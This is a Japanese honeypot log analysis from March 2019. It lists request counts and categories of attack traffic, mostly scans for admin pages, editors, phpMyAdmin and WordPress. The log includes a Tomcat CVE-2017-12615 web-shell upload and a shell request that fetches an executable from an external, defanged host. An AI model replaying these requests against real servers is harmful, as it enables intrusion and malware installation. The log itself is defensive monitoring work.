BW-Potのログ分析 (2019/03/28)
中国にある1つのIPからドメインあてに多数の通信が来ました。
以下の表にある通信件数が1件の通信は、ほぼすべて同一の送信元からの通信でした。
通信のほとんどが意図がわからず、不明としてあります。
後日時間があれば調査しようと思います。
件数 | 種別 | リクエスト |
360 | phpMyAdminに関する攻撃 | POST /phpmyadmin/ |
283 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
48 | アクセス | GET / |
10 | WordPressに関する調査 | GET /wp-login.php |
9 | WordPressへのログイン試行 | POST /wp-login.php |
5 | WordPress、XML-RPCに関する攻撃 | POST /xmlrpc.php |
2 | 不正中継の調査 | GET api.binance[.]com/api/v1/time |
2 | クローリング | HEAD /robots.txt |
1 | WordPressのユーザー情報の取得 | GET ///?author=1 |
1 | WordPressのユーザー情報の取得 | GET ///wp-json/wp/v2/users/ |
1 | 不明 | GET /404.jpg |
1 | 不明 | GET /?q=login.destroy.session&r=0.01231231230 |
1 | 不明 | GET /API/DW/Dwplugin/SystemLabel/SiteConfig.htm |
1 | 不明 | GET /API/DW/Dwplugin/TemplateManage/login_site.htm |
1 | 不明 | GET /API/DW/Dwplugin/TemplateManage/manage_site.htm |
1 | 不明 | GET /API/DW/Dwplugin/TemplateManage/save_template.htm |
1 | 不明 | GET /API/DW/Dwplugin/ThirdPartyTags/SiteFactory.xml |
1 | 不明 | GET /Admin/Common/HelpLinks.xml |
1 | 不明 | GET /Admin/Images/LoginImages/admin_text.gif |
1 | 不明 | GET /Admin/Images/LoginImages/admin_top.gif |
1 | 不明 | GET /Admin/Login.aspx |
1 | 不明 | GET /CHANGELOG.txt |
1 | CuteEditorに関する調査 | GET /CuteSoft_Client/CuteEditor/Help/default.htm |
1 | CuteEditorに関する調査 | GET /CuteSoft_Client/CuteEditor/ImageEditor/listfiles.aspx |
1 | CuteEditorに関する調査 | GET /CuteSoft_Client/CuteEditor/Images/log.gif |
1 | CuteEditorに関する調査 | GET /CuteSoft_Client/CuteEditor/Style/IE.css |
1 | 不明 | GET /Editor.js |
1 | 不明 | GET /Error.aspx |
1 | FCKeditorに関する調査 | GET /FCK/editor/js/fckeditorcode_ie.js |
1 | FCKeditorに関する調査 | GET /FCK/fckeditor.js |
1 | Apache Tomcatの脆弱性(CVE-2017-12615)を利用した攻撃 | PUT /FxCodeShell.jsp%20 |
1 | Apache Tomcatの脆弱性(CVE-2017-12615)を利用した攻撃 | PUT /FxCodeShell.jsp/ |
1 | Apache Tomcatの脆弱性(CVE-2017-12615)を利用した攻撃 | PUT /FxCodeShell.jsp::$DATA |
1 | Apache Tomcatの脆弱性(CVE-2017-12615)を利用した攻撃 | GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid.hognoob[.]se/download.exe |
1 | 不明 | GET /HNAP1 |
1 | 不明 | GET /Help |
1 | 不明 | GET /Images/login/biaoti.jpg |
1 | 不明 | GET /Images/login/lefttu.jpg |
1 | 不明 | GET /Images/login/mainlogo.gif |
1 | 不明 | GET /Include/EcsServerApi.js |
1 | 不明 | GET /Install/logo.gif |
1 | 不明 | GET /License.txt |
1 | NMAPによるスキャン | GET /Nmap/folder/check1553713171 |
1 | NMAPによるスキャン | GET /NmapUpperCheck1553713171 |
1 | 不明 | GET /Ntalker/lawfirm.aspx?17 |
1 | 不明 | GET /Prompt/images/P_Wrong.gif |
1 | 不明 | GET /Public/Admin/Images/login_main_bg.jpg |
1 | 不明 | GET /README.txt |
1 | 不明 | GET /Scripts/jquery/maticsoft.jquery.min.js |
1 | 不明 | GET /Search.html |
1 | 不明 | GET /Site/Pages/WebResources.ashx/PoweredByKodakImage |
1 | 不明 | GET /Site/SystemThemes/7917A0869761B5458281E407AE0090F5/Images/ISBanner58px.jpg |
1 | 不明 | GET /Template/Default/Skin/user/images/login_back.jpg |
1 | 不明 | GET /User/Login.aspx |
1 | 不明 | GET /UserCenter/css/admin/bgimg/admin_all_bg.png |
1 | 不明 | GET /Wq_StranJF.js |
1 | 不明 | GET /about/version |
1 | 不明 | GET /addons/theme/stv1/_static/image/favicon.ico |
1 | 不明 | GET /addons/theme/stv1/_static/ts2/layout.css |
1 | 不明 | GET /addons/theme/stv2/_static/ts2/layout.css |
1 | 不明 | GET /admin |
1 | 不明 | GET /admin.php |
1 | 不明 | GET /admin.php?mod=profile&u_key=123456 |
1 | 不明 | GET /admin/ |
1 | 不明 | GET /admin/SouthidcEditor/ButtonImage/standard/componentmenu.gif |
1 | 不明 | GET /admin/SouthidcEditor/Dialog/dialog.js |
1 | 不明 | GET /admin/SouthidcEditor/ewebeditor.asp?id=57&style=southidc |
1 | 不明 | GET /admin/admin_login.php?act=login |
1 | 不明 | GET /admin/editor/ |
1 | 不明 | GET /admin/editor/?c=4e5e5d7364f443e28fbf0d3ae744a59a |
1 | 不明 | GET /admin/editor/asp.net/README.txt |
1 | 不明 | GET /admin/editor/examples/file-manager.html |
1 | 不明 | GET /admin/editor/examples/index.html |
1 | 不明 | GET /admin/editor/examples/readonly.html |
1 | 不明 | GET /admin/editor/kindeditor-min.js |
1 | 不明 | GET /admin/editor/kindeditor.js |
1 | 不明 | GET /admin/editor/lang/en.js |
1 | 不明 | GET /admin/editor/plugins/anchor/anchor.js |
1 | 不明 | GET /admin/editor/plugins/filemanager/filemanager/js |
1 | 不明 | GET /admin/editor/themes/default/default.css |
1 | 不明 | GET /admin/inc/xml.xslt |
1 | 不明 | GET /admin/index.php |
1 | 不明 | GET /admin/js/IdSUtil.js |
1 | 不明 | GET /admin/login.asp |
1 | 不明 | GET /admin/login.aspx |
1 | 不明 | GET /admin/login.php |
1 | 不明 | GET /admin/start/index.php |
1 | 不明 | GET /admin/template/article_more/config.htm |
1 | 不明 | GET /administrator/manifests/files/joomla.xml |
1 | 不明 | GET /adminsoft/templates/images/login_bg_top.jpg |
1 | 不明 | GET /advfile/ad12.js |
1 | 不明 | GET /api/api_user.xml |
1 | GET api.binance.com/api/v1/ticker/24hr?symbol=BTCUSDT | |
1 | 不明 | GET /app/Tpl/fanwe_1/js/DD_belatedPNG_0.0.8a-min.js |
1 | 不明 | GET /app/home/skins/default/style.css |
1 | 不明 | GET /app/images/login/logo.png |
1 | 不明 | GET /app/images/login/toplogo.gif |
1 | 不明 | GET /app/js/source/wcmlib/WCMConstants.js |
1 | 不明 | GET /app/login.jsp |
1 | 不明 | GET /apps/admin/_static/image/login_box_bg.png |
1 | 不明 | GET /archive/archive.css |
1 | 不明 | GET /archiver |
1 | 不明 | GET /archiver/ |
1 | 不明 | GET /asp.net/README.txt |
1 | 不明 | GET /auth/login |
1 | 不明 | GET /back/scripts/jspxcms_choose.js |
1 | 不明 | GET /base/login/login.php |
1 | 不明 | GET /bbs/ |
1 | 不明 | GET /bbs/?c=4e5e5d7364f443e28fbf0d3ae744a59a |
1 | 不明 | GET /bbs/admin/login.php |
1 | 不明 | GET /bbs/archive/archive.css |
1 | 不明 | GET /bbs/archiver |
1 | 不明 | GET /bbs/archiver/ |
1 | 不明 | GET /bbs/clientscript/vbulletin_ajax_htmlloader.js |
1 | 不明 | GET /bbs/extern.php?action=feed&type=atom |
1 | 不明 | GET /bbs/favicon.ico |
1 | 不明 | GET /bbs/forum.php |
1 | 不明 | GET /bbs/forums/list.page |
1 | 不明 | GET /bbs/images/logo_88x31.gif |
1 | 不明 | GET /bbs/inc/Templates/rss.xslt |
1 | 不明 | GET /bbs/index.php |
1 | 不明 | GET /bbs/licence.txt |
1 | 不明 | GET /bbs/max-templates/classic/styles/app.css |
1 | 不明 | GET /bbs/public/js/ipb.js |
1 | 不明 | GET /bbs/robots.txt |
1 | 不明 | GET /bbs/rss.aspx |
1 | 不明 | GET /bbs/rss.php |
1 | 不明 | GET /bbs/tools/rss.aspx |
1 | 不明 | GET /bbs/uc_server/control/admin/db.php |
1 | 不明 | GET /bencandy.php |
1 | 不明 | GET /cgi/index.cgi |
1 | 不明 | GET /changelog.txt |
1 | 不明 | GET /ckeditor/ckeditor.js |
1 | 不明 | GET /ckeditor/ckfinder/ckfinder.html |
1 | 不明 | GET /ckeditor/ckfinder/install.txt |
1 | 不明 | GET /ckfinder/ckfinder.html |
1 | 不明 | GET /ckfinder/install.txt |
1 | 不明 | GET /clientscript/vbulletin_ajax_htmlloader.js |
1 | 不明 | GET /common/common.js |
1 | 不明 | GET /common/help/images/helplogo.gif |
1 | 不明 | GET /common/help/images/helplogo_zh.gif |
1 | 不明 | GET /console/auth/reg_newuser.jsp |
1 | 不明 | GET /console/include/not_login.htm |
1 | 不明 | GET /console/js/CTRSRequestParam.js |
1 | 不明 | GET /console/js/CWCMDialogHead.js |
1 | 不明 | GET /coremail/common/help/images/helplogo.gif |
1 | 不明 | GET /coremail/common/help/images/helplogo_zh.gif |
1 | 不明 | GET /custom/SkinTemplate/skin/public/images/sys-logo-1caitong-180.jpg |
1 | 不明 | GET /customdir/images/english_logo.jpg |
1 | 不明 | GET /data/admin/ver.txt |
1 | 不明 | GET /data/images/wap_logo.gif |
1 | 不明 | GET /datacenter/downloadApp/showDownload.do |
1 | 不明 | GET /default/css/em_css.css |
1 | 不明 | GET /default/images/logo.gif |
1 | 不明 | GET /deptWebsiteAction.do |
1 | 不明 | GET /dialog/dialog.js |
1 | 不明 | GET /digg.php |
1 | 不明 | GET /docs.css |
1 | 不明 | GET /docs/ |
1 | 不明 | GET /docs/DOCUMENTATION.txt |
1 | 不明 | GET /doku.php |
1 | 不明 | GET /e/master/login.aspx |
1 | 不明 | GET /eams/static/scripts/grade/course/input.js |
1 | FCKeditorに関する調査 | GET /editor/fckeditor.js |
1 | FCKeditorに関する調査 | GET /editor/js/fckeditorcode_ie.js |
1 | 不明 | GET /examples/file-manager.html |
1 | 不明 | GET /examples/index.html |
1 | 不明 | GET /examples/readonly.html |
1 | 不明 | GET /extern.php?action=feed&type=atom |
1 | 不明 | GET /extman/default/images/logo.gif |
1 | アクセス | GET /favicon.ico |
1 | FCKeditorに関する調査 | GET /fckeditor.js |
1 | 不明 | GET /fckeditor/editor/dtd/fck_dtd_test.html |
1 | FCKeditorに関する調査 | GET /fckeditor/editor/js/fckeditorcode_ie.js |
1 | 不明 | GET /fckeditor/fckconfig.js |
1 | FCKeditorに関する調査 | GET /fckeditor/fckeditor.js |
1 | 不明 | GET /fckeditor/license.txt |
1 | 不明 | GET /feed.asp |
1 | 不明 | GET /forum.php |
1 | 不明 | GET /forum/ |
1 | 不明 | GET /forums/list.page |
1 | 不明 | GET /help/ch_gb/images/help-title.gif |
1 | 不明 | GET /help/en/h_authenticate.html |
1 | 不明 | GET /help/user/index.html |
1 | 不明 | GET /helpnew/faq/faq_simple_zh_CN.jsp |
1 | 不明 | GET /history.txt |
1 | 不明 | GET /ids/admin/login.jsp |
1 | 不明 | GET /ids/admin/userhome/forgetPwd.jsp |
1 | 不明 | GET /images/2_11.gif |
1 | 不明 | GET /images/Default_bg_002.gif |
1 | 不明 | GET /images/branding/logo.gif |
1 | 不明 | GET /images/default/post_bt.gif |
1 | 不明 | GET /images/favicon.ico |
1 | 不明 | GET /images/hwem.css |
1 | 不明 | GET /images/login/eyoumail.gif |
1 | 不明 | GET /images/login/icon-up.gif |
1 | 不明 | GET /images/login/logo.gif |
1 | 不明 | GET /images/login9/login_33.jpg |
1 | 不明 | GET /images/login_Name.jpg |
1 | 不明 | GET /images/logo-white.png |
1 | 不明 | GET /images/logo_88x31.gif |
1 | 不明 | GET /images/logo_product-cml.png |
1 | 不明 | GET /images/zh-CN/logo.ico |
1 | 不明 | GET /imagesschool/style1/flash2.jpg |
1 | 不明 | GET /img/pic/login/top-left.jpg |
1 | 不明 | GET /inc/Templates/rss.xslt |
1 | 不明 | GET /inc/playerKinds.xml |
1 | 不明 | GET /inc/rsd.php |
1 | 不明 | GET /include/dedeajax2.js |
1 | 不明 | GET /include/dialog/config.php |
1 | 不明 | GET /include/install_ocx.aspx |
1 | 不明 | GET /includes/general.js |
1 | 不明 | GET /index.cgi |
1 | 不明 | GET /index.php |
1 | 不明 | GET /index.php?m=admin |
1 | 不明 | GET /index.php?m=admin&c=index&a=login&pc_hash= |
1 | 不明 | GET /index.php?m=search |
1 | 不明 | GET /index.php?m=wap |
1 | 不明 | GET /install |
1 | 不明 | GET /issmall/ |
1 | 不明 | GET /jcms/index.jsp |
1 | 不明 | GET /jcms/index_jcms.jsp |
1 | 不明 | GET /js/ajax_x.js |
1 | 不明 | GET /js/buttons.js |
1 | 不明 | GET /kindeditor-min.js |
1 | 不明 | GET /kindeditor.js |
1 | 不明 | GET /ks_inc/ajax.js |
1 | 不明 | GET /lang/en.js |
1 | 不明 | GET /licence.txt |
1 | 不明 | GET /list.php |
1 | 不明 | GET /login/Jeecms.do |
1 | 不明 | GET /m |
1 | 不明 | GET /maintlogin.jsp |
1 | 不明 | GET /master/login.aspx |
1 | 不明 | GET /max-templates/classic/styles/app.css |
1 | 不明 | GET /media/com_hikashop/js/hikashop.js |
1 | 不明 | GET /member/space/company/info.txt |
1 | 不明 | GET /new_gb/help/images/usage/3.3.gif |
1 | 不明 | GET /next/img/logo.gif |
1 | NMAPによるスキャン | GET /nmaplowercheck1553713171 |
1 | 不明 | GET /nobody/mobile.htm?Login=Captcha |
1 | phpMyAdminに関する調査 | GET /phpMyAdmin/scripts/setup.php |
1 | 不明 | GET /phpmyadmin/ |
1 | 不明 | GET /phpmyadmin/Documentation.html |
1 | 不明 | GET /phpmyadmin/README |
1 | 不明 | GET /phpmyadmin/docs.css |
1 | 不明 | GET /phpmyadmin/favicon.ico |
1 | 不明 | GET /phpmyadmin/themes/original/img/logo_right.png |
1 | 不明 | GET /plug/publish |
1 | 不明 | GET /plugin.php?id=milu_seotool:sitemap&tpl=no&myac=milu_seotool_cron&inajax=1 |
1 | 不明 | GET /plugins/anchor/anchor.js |
1 | 不明 | GET /plugins/filemanager/filemanager/js |
1 | 不明 | GET /plus/download.php |
1 | 不明 | GET /plus/heightsearch.php |
1 | 不明 | GET /plus/rssmap.html |
1 | 不明 | GET /plus/sitemap.html |
1 | 不明 | GET /pub/guiedit/guiedit.js |
1 | 不明 | GET /pub/skins/pmwiki/pmwiki.css |
1 | 不明 | GET /public/about.html |
1 | 不明 | GET /public/js/ipb.js |
1 | 不明 | GET /readme.html |
1 | クローリング | GET /robots.txt |
1 | 不明 | GET /rss.aspx |
1 | 不明 | GET /rss.php |
1 | 不明 | GET /script/login.js |
1 | 不明 | GET /script/valid_formdata.js |
1 | NMAPによるスキャン | POST /sdk |
1 | 不明 | GET /siteserver/login.aspx |
1 | 不明 | GET /siteserver/upgrade/default.aspx |
1 | 不明 | GET /skin/frontend/default/modern/css/styles.css |
1 | 不明 | GET /static/hgicon.png |
1 | 不明 | GET /static/images/logo/webserver_small.gif |
1 | 不明 | GET /style/default/hdwiki.css |
1 | 不明 | GET /stylesheet.css |
1 | 不明 | GET /system/Login.aspx |
1 | 不明 | GET /system/Update.aspx |
1 | 不明 | GET /system/language/zh-cn.xml |
1 | 不明 | GET /system/skins/default/system.login.htm |
1 | 不明 | GET /template/1/bluewise/_files/jspxcms.css |
1 | 不明 | GET /template/home.htm |
1 | 不明 | GET /templates/jsn_glass_pro/ext/hikashop/jsn_ext_hikashop.css |
1 | 不明 | GET /test_404_page/ |
1 | 不明 | GET /themes/default/default.css |
1 | 不明 | GET /themes/default/graphics/favicon.ico |
1 | 不明 | GET /themes/default/graphics/horde-power1.png |
1 | 不明 | GET /themes/graphics/horde-power1.png |
1 | 不明 | GET /tools/rss.aspx |
1 | 不明 | GET /tpl/login/user/images/login_bg_1.jpg |
1 | 不明 | GET /tpl/user/tpl1/css/skins/blue.css |
1 | 不明 | GET /uc_server/control/admin/db.php |
1 | phpMyAdminに関する調査 | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
1 | 不明 | GET /wcm/ |
1 | 不明 | GET /wcm/?c=4e5e5d7364f443e28fbf0d3ae744a59a |
1 | 不明 | GET /wcm/app/images/login/logo.png |
1 | 不明 | GET /wcm/app/images/login/toplogo.gif |
1 | 不明 | GET /wcm/app/js/source/wcmlib/WCMConstants.js |
1 | 不明 | GET /wcm/app/login.jsp |
1 | 不明 | GET /wcm/console/auth/reg_newuser.jsp |
1 | 不明 | GET /wcm/console/include/not_login.htm |
1 | 不明 | GET /wcm/console/js/CTRSRequestParam.js |
1 | 不明 | GET /wcm/console/js/CWCMDialogHead.js |
1 | 不明 | GET /web2/login_template/1.files/Logo1.jpg |
1 | 不明 | GET /webbuilder/script/locale/wb-lang-zh_CN.js |
1 | 不明 | GET /whir_system/login.aspx |
1 | 不明 | GET /whir_system/module/security/login.aspx |
1 | 不明 | GET /wp-cron.php |
1 | WordPressのユーザー情報の取得 | GET /wp-json/wp/v2/users/ |
1 | 不明 | GET /ycportal/js/wbTextBox/showimg.jsp |
1 | 不明 | GET /ymail/images/index_r1_c4.jpg |